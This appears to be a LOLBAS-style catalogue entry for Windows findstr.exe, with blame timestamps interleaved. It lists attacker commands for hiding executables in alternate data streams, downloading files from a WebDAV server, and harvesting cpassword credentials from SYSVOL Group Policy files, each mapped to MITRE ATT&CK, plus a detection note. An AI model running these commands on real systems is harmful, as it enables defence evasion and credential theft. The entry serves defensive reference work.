2018-06-09 00:15:06 +02:00
---
Name : Findstr.exe
2018-09-24 21:59:43 +02:00
Description :
Author : 'Oddvar Moe'
2018-06-09 00:15:06 +02:00
Created : '2018-05-25'
Commands :
- Command : findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
2018-09-24 21:59:43 +02:00
Description : Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase : Add a file to an alternate data stream to hide from defensive counter measures
2018-09-26 09:34:01 +02:00
Category : ADS
2018-09-24 21:59:43 +02:00
Privileges : User
MitreID : T1096
MitreLink : https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command : findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
2018-09-24 21:59:43 +02:00
Description : Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase : Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
2018-09-26 09:34:01 +02:00
Category : ADS
2018-09-24 21:59:43 +02:00
Privileges : User
MitreID : T1096
MitreLink : https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command : findstr /S /I cpassword \\sysvol\policies\*.xml
Description : Search for stored password in Group Policy files stored on SYSVOL.
Usecase : Find credentials stored in cpassword attrbute
Category : Credentials
Privileges : User
MitreID : T1081
MitreLink : https://attack.mitre.org/wiki/Technique/T1081
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command : findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Description : Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase : Download/Copy file from webdav server
Category : Download
Privileges : User
MitreID : T1185
MitreLink : https://attack.mitre.org/wiki/Technique/T1185
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-12-10 14:28:12 +01:00
Full_Path :
2018-09-24 21:59:43 +02:00
- Path : C:\Windows\System32\findstr.exe
- Path : C:\Windows\SysWOW64\findstr.exe
2018-12-10 14:28:12 +01:00
Code_Sample :
2018-09-24 21:59:43 +02:00
- Code :
Detection :
2021-03-20 21:40:37 +01:00
- IOC : findstr.exe should normally not be invoked on a client system
2018-06-09 00:15:06 +02:00
Resources :
2018-09-24 21:59:43 +02:00
- Link : https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link : https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement :
- Person : Oddvar Moe
Handle : '@oddvarmoe'
2021-03-20 21:40:37 +01:00
---